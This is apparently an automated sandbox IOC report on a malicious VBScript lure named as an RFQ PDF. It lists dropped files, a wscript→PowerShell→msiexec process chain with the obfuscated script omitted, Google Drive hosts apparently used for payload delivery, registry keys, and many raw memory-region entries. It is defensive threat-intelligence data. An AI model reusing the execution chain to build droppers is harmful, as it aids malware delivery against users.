IOC Report
RFQ_24196MR_PDF.vbs

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| RFQ_24196MR_PDF.vbs | ASCII text, with CRLF line terminators | initial sample | malicious |
| C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_5bf5219ded9fba7eedec77d072a1c9e5c7a57c4_4aa59577_bced51df-f61f-4fea-9980-4eb0aca94c31\Report.wer | Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped | |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD38.tmp.dmp | Mini DuMP crash report, 14 streams, Fri Oct 25 17:44:13 2024, 0x1205a4 type | dropped | |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE81.tmp.WERInternalMetadata.xml | XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped | |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WERCEA1.tmp.xml | XML 1.0 document, ASCII text, with CRLF line terminators | dropped | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkgx4jan.30z.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o42kqqmh.lxh.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otjk2z2d.zfa.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spxg54pp.rr4.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Roaming\Solidifiable.Sch | ASCII text, with very long lines (65536), with no line terminators | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Windows\System32\wscript.exe | C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs" | malicious |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]" | malicious |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]" | malicious |
| C:\Windows\SysWOW64\msiexec.exe | "C:\Windows\SysWOW64\msiexec.exe" | malicious |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292 | |

URLs

| Name | IP | Malicious |
|---|---|---|
| http://nuget.org/NuGet.exe | unknown | |
| http://drive.usercontent.google.com | unknown | |
| http://pesterbdd.com/images/Pester.png | unknown | |
| http://www.apache.org/licenses/LICENSE-2.0.html | unknown | |
| https://go.micro | unknown | |
| https://drive.usercontent.google.com( | unknown | |
| https://contoso.com/License | unknown | |
| https://contoso.com/Icon | unknown | |
| https://drive.usercontent.googh | unknown | |
| https://drive.usercontent.google.com/ | unknown | |
| http://drive.google.com | unknown | |
| https://drive.google.com/5f | unknown | |
| https://github.com/Pester/Pester | unknown | |
| https://www.google.com | unknown | |
| https://drive.google.com/=f | unknown | |
| https://drive.googPR | unknown | |
| http://crl.micro | unknown | |
| https://aka.ms/pscore6lBdq | unknown | |
| https://contoso.com/ | unknown | |
| https://nuget.org/nuget.exe | unknown | |
| https://drive.google.com | unknown | |
| https://drive.usercontent.google.com | unknown | |
| https://aka.ms/pscore68 | unknown | |
| https://apis.google.com | unknown | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown | |

Domains

| Name | IP | Malicious |
|---|---|---|
| drive.google.com | 142.250.185.238 | |
| drive.usercontent.google.com | 172.217.16.193 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 172.217.16.193 | drive.usercontent.google.com | United States | |
| 142.250.185.238 | drive.google.com | United States | |

Registry

| Path | Value | Malicious |
|---|---|---|
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | |

Memdumps

| Base Address | Regiontype | Protect | Malicious |
|---|---|---|---|
| 8610000 | direct allocation | page execute and read and write | malicious |
| 5665000 | trusted library allocation | page read and write | malicious |
| 1DEEBB8F000 | trusted library allocation | page read and write | malicious |
| 8DD5000 | direct allocation | page execute and read and write | malicious |
page read and write
1DEF4020000
heap
page read and write
591B000
heap
page read and write
2109EF21000
heap
page read and write
206D0000
direct allocation
page read and write
27D0000
heap
page read and write
561E000
unkown
page read and write
6BED000
stack
page read and write
210A0AF0000
heap
page read and write
6F70000
direct allocation
page read and write
1DED9E60000
heap
page read and write
4785000
remote allocation
page execute and read and write
2109EEAE000
heap
page read and write
76F788B000
stack
page read and write
1DED9EC7000
heap
page read and write
8185000
trusted library allocation
page read and write
2109EEF2000
heap
page read and write
6C80000
direct allocation
page read and write
7201000
heap
page read and write
2109EF42000
heap
page read and write
1DEDC05D000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
2AD1000
heap
page read and write
1DEDC1C6000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
20BFD000
stack
page read and write
1DEDBAF0000
heap
page execute and read and write
20DF0000
remote allocation
page read and write
27E0000
heap
page read and write
2CAE000
stack
page read and write
1DEDD5FF000
trusted library allocation
page read and write
210A097E000
heap
page read and write
2109EF42000
heap
page read and write
1DEDDC2D000
trusted library allocation
page read and write
76F66FF000
stack
page read and write
1DEDCA4A000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
584F000
stack
page read and write
55DE000
unkown
page read and write
210A0993000
heap
page read and write
210A09B2000
heap
page read and write
666E000
stack
page read and write
1DEF3F18000
heap
page read and write
1DEEBB21000
trusted library allocation
page read and write
1DEDB98A000
heap
page read and write
1DEF4100000
heap
page read and write
210A108D000
heap
page read and write
210A0978000
heap
page read and write
29E2000
unkown
page read and write
45E8000
heap
page read and write
6A15000
heap
page execute and read and write
742D000
stack
page read and write
2109EF7B000
heap
page read and write
2109EF06000
heap
page read and write
5675000
heap
page read and write
210A099B000
heap
page read and write
210A0975000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FF0000
trusted library allocation
page read and write
210A09A3000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
210A097E000
heap
page read and write
7F5D000
stack
page read and write
58DF000
heap
page read and write
6EB0000
heap
page read and write
1DEDA0B5000
heap
page read and write
58AE000
heap
page read and write
82D0000
heap
page read and write
7DF485AC0000
trusted library allocation
page execute and read and write
82F0000
heap
page read and write
1DEDC2A0000
trusted library allocation
page read and write
20C70000
trusted library allocation
page read and write
1DEDC56F000
trusted library allocation
page read and write
29EE000
unkown
page read and write
210A097E000
heap
page read and write
6A9E000
stack
page read and write
210A09A6000
heap
page read and write
20AA0000
heap
page read and write
210A0970000
heap
page read and write
1DEF4133000
heap
page read and write
210A0F69000
heap
page read and write
1DEDC03B000
trusted library allocation
page read and write
5921000
heap
page read and write
1DEDCA35000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
2109EF42000
heap
page read and write
1DEDB970000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
76F6DBC000
stack
page read and write
7FFD9B780000
trusted library allocation
page read and write
8030000
trusted library allocation
page read and write
6C70000
direct allocation
page read and write
82C0000
trusted library allocation
page execute and read and write
1DEF4198000
heap
page read and write
58E4000
heap
page read and write
2109EEEF000
heap
page read and write
21030000
heap
page read and write
20F5E000
stack
page read and write
1DEDBAE7000
heap
page execute and read and write
29E8000
unkown
page read and write
8670000
direct allocation
page read and write
71E9000
heap
page read and write
1DED9EAB000
heap
page read and write
210A09A6000
heap
page read and write
5660000
heap
page read and write
7FCD0000
trusted library allocation
page execute and read and write
854D000
stack
page read and write
2109EF7A000
heap
page read and write
2D60000
heap
page read and write
20AFE000
stack
page read and write
20DF0000
remote allocation
page read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
6A5F000
stack
page read and write
2109EF42000
heap
page read and write
1DEDCA70000
trusted library allocation
page read and write
5932000
heap
page read and write
27C9000
heap
page read and write
8690000
trusted library allocation
page execute and read and write
7FFD9B782000
trusted library allocation
page read and write
2109EF31000
heap
page read and write
5670000
heap
page read and write
8570000
heap
page read and write
72E0000
heap
page execute and read and write
1DEDC107000
trusted library allocation
page read and write
2D12000
trusted library allocation
page read and write
1DEDDC14000
trusted library allocation
page read and write
2109EF18000
heap
page read and write
1DED9EAD000
heap
page read and write
4568000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page read and write
662C000
stack
page read and write
2109EF4D000
heap
page read and write
210A0976000
heap
page read and write
723F000
heap
page read and write
20E6F000
stack
page read and write
2D0A000
trusted library allocation
page execute and read and write
210A0977000
heap
page read and write
210A0972000
heap
page read and write
97D5000
direct allocation
page execute and read and write
8309000
heap
page read and write
1DEDBB10000
heap
page execute and read and write
1DEDA040000
heap
page read and write
1DEDC0E1000
trusted library allocation
page read and write
76F667E000
stack
page read and write
1DEF3E60000
heap
page read and write
2109EF42000
heap
page read and write
6C60000
direct allocation
page read and write
1DEF3FF0000
heap
page read and write
1DEDB8A0000
trusted library allocation
page read and write
206F0000
direct allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
210A0996000
heap
page read and write
27C0000
heap
page read and write
1DEEBE28000
trusted library allocation
page read and write
76F63EE000
stack
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
2109EEEB000
heap
page read and write
1DEDDC3A000
trusted library allocation
page read and write
2D6B000
heap
page read and write
5860000
heap
page read and write
1DED9EA6000
heap
page read and write
5947000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
20CFF000
stack
page read and write
8650000
direct allocation
page read and write
210A099F000
heap
page read and write
76F687E000
stack
page read and write
2109EF37000
heap
page read and write
2CE4000
trusted library allocation
page read and write
29DC000
unkown
page read and write
1DED9EF4000
heap
page read and write
210A0980000
heap
page read and write
20720000
direct allocation
page read and write
27C5000
heap
page read and write
7EF0000
trusted library allocation
page read and write
1DEDC4BE000
trusted library allocation
page read and write
2109F170000
heap
page read and write
1DEDDC18000
trusted library allocation
page read and write
4590000
heap
page read and write
2AAD000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
733E000
stack
page read and write
1DED9E00000
heap
page read and write
2109EEA8000
heap
page read and write
2109EF29000
heap
page read and write
A1D5000
direct allocation
page execute and read and write
2109EEF5000
heap
page read and write
2D00000
trusted library allocation
page read and write
210A0983000
heap
page read and write
1DED9E77000
heap
page read and write
7FE0000
trusted library allocation
page read and write
1DEF41D0000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1DEF4024000
heap
page read and write
1DEDD168000
trusted library allocation
page read and write
1DEF3F56000
heap
page read and write
2109EF30000
heap
page read and write
2CB0000
trusted library section
page read and write
6B1E000
stack
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1DEDC02E000
trusted library allocation
page read and write
1DEF41C2000
heap
page read and write
2D50000
trusted library allocation
page execute and read and write
6FC30FE000
stack
page read and write
There are 524 hidden memdumps, click here to show them.